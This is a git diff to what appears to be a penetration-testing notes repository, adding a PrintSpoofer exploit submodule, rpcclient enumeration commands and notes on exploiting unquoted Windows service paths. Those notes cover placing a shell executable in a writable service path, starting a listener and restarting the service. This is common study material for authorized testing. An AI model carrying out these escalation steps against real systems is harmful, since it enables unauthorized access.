diff --git a/.gitmodules b/.gitmodules index 5ca311d..06838ac 100644 --- a/.gitmodules +++ b/.gitmodules @@ -136,3 +136,6 @@ [submodule "stego/stego-toolkit"] path = stego/stego-toolkit url = https://github.com/DominicBreuker/stego-toolkit.git +[submodule "exploit/windows/printspoofer"] + path = exploit/windows/printspoofer + url = https://github.com/dievus/printspoofer.git diff --git a/enumeration/windows/bloodhound.md b/enumeration/windows/bloodhound.md new file mode 100644 index 0000000..3d92bb8 --- /dev/null +++ b/enumeration/windows/bloodhound.md @@ -0,0 +1,3 @@ +# Bloodhound + +* DNS diff --git a/enumeration/windows/rpcclient.md b/enumeration/windows/rpcclient.md new file mode 100644 index 0000000..315e8a2 --- /dev/null +++ b/enumeration/windows/rpcclient.md @@ -0,0 +1,10 @@ +# RPCclient + +* Enumerate users and groups + +```sh +rpcclient +rpcclient $> enumdomusers +... +rpcclient $> enumdomgroups +``` diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md index 0e89282..5ddd0f5 100644 --- a/exploit/windows/docs/unquoted_path.md +++ b/exploit/windows/docs/unquoted_path.md @@ -14,3 +14,27 @@ copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe" net start ``` +## Intel about Service + +* Access should contain writeable +```sh +Get-Acl -Path | Format-List +``` + +* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1` + +* Check `ServiceRights` via +```sh +"" | Get-ServiceAcl | select ExpandProperty Access +``` + +## Interacting with the Service + +* Upload msfvenom shell to the writeable path, setup listener and +```sh +sc start "servicename" +Stop-Service -name "servicename" +Start-Service -name "servicename" +``` + + diff --git a/exploit/windows/printspoofer b/exploit/windows/printspoofer new file mode 160000 index 0000000..29a9e27 --- /dev/null +++ b/exploit/windows/printspoofer 
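Review bot: The new `[submodule "exploit/windows/printspoofer"]` entry records only a URL, so nothing in this file says why that particular third-party repository was chosen or whether it is the tool's original source or a fork; the commit actually checked out lives in the gitlink, not here. Since .gitmodules is read with git's config parser, which ignores lines starting with `#`, a one-line provenance note above the entry would help anyone auditing what this repository vendors, e.g. `# vendored from a third-party account; if this is a fork or mirror, name the upstream and re-verify before bumping the pinned commit`. The surrounding `stego/stego-toolkit` entry shows the same bare style, so the same note could be applied consistently across the file.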
@@ -0,0 +1 @@
+Subproject commit 29a9e27f5418317bd5f4560ccfebcb65ca181b32